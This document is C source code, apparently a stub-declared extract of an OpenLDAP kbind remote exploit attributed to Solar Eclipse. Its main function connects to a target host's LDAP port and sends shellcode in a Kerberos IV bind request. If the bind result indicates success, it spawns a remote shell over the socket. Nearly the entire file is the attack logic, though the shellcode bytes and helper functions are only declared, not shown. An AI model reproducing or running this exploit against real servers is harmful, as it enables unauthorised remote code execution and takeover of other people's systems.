
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 size_t FINDSCKPORTOFS ;
 int LDAP_AUTH_KRBV41 ;
 int SHELLCODE_LEN ;
 int build_shellcode (char*,int) ;
 int close (int) ;
 int connect_host (char*,int) ;
 int exit (int) ;
 int get_local_port (int) ;
 char* ldap_result (int) ;
 int printf (char*,...) ;
 int read_bind_result (int) ;
 int send_bind_request (int,int ,char*,char*) ;
 int sh (int) ;
 char* shellcode ;
 int sleep (int) ;
 int write (int,char*,int) ;

int main(int argc, char* argv[])
{
 char shellcode_buf[SHELLCODE_LEN+1];
 int port, sock, res;
 char* dn;
 char* p;

 printf(": openldap-kbind-p00f.c - OpenLDAP kbind remote exploit\n");
 printf("\n");
 printf(": Only works on servers compiled with\n");
 printf("    --enable-kbind    enable LDAPv2+ Kerberos IV bind (deprecated) [no]\n");
 printf("\n");
 printf(": by Solar Eclipse <solareclipse@phreedom.org>\n\n");

 if (argc < 3) {
  printf(": Usage: %s hostname bind_dn\n", argv[0]);
  printf("  The bind_dn must exist in the LDAP directory.\n");
  exit(1);
 }

 dn = argv[2];

 port = 389;
 sock = connect_host(argv[1], port);
 port = get_local_port(sock);

 shellcode[FINDSCKPORTOFS] = (char) (port & 0xff);
 shellcode[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff);

 build_shellcode(shellcode_buf, SHELLCODE_LEN);
 shellcode_buf[SHELLCODE_LEN] = '\0';

 printf("Sending shellcode\n");
 send_bind_request(sock, LDAP_AUTH_KRBV41, dn, shellcode_buf);

 sleep(2);


 write(sock, "echo 'a';\n", 10);

 printf("Reading bind result\n");
 res = read_bind_result(sock);
 if (res > 0)
  printf("LDAP_AUTH_KRBV41 bind request returned %s\n", ldap_result(res));
 else {
  printf("Spawning shell...\n");
  sh(sock);
 }

 close(sock);

 return 0;
}
